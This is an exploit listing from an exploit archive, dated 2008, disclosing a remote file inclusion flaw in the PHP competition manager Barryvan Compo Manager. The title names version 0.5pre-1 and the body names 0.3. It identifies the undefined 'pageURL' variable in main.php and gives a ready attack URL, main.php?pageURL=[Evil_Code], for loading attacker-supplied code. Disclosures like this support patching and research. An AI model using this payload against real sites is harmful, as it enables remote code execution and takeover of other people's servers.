id: 2706
date: 02/28/2008
title: Barryvan Compo Manager 0.5pre-1 Remote File Inclusion Vulnerability
author: MhZ91
cves: 

===================================================================
Barryvan Compo Manager 0.5pre-1 Remote File Inclusion Vulnerability
===================================================================



--==+================================================================================+==--
--==+		barryvancompo-0.3 Remote File Inclusion                              +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: barryvancompo-0.3 Remote File Inclusion 
 Download: http://sourceforge.net/projects/barryvancompo/
 Bug: Remote File Inclusion
 Info: The barryvan compo manager is a PHP, Smarty and MySQL-based system for running, organising, and maintaining competitions. It is particularly designed for use within the computer music "scene".

[*]----------------------------------------------------------

barryvancompo-0.3 present a variable "pageURL" not definited in this file 

main.php
(and all files require it)

we can exploit it by the variable "pageURL", for example

http://www.example.com/main.php?pageURL=[Evil_Code]


[*]----------------------------------------------------------






#  0day.today [2023-03-25]  #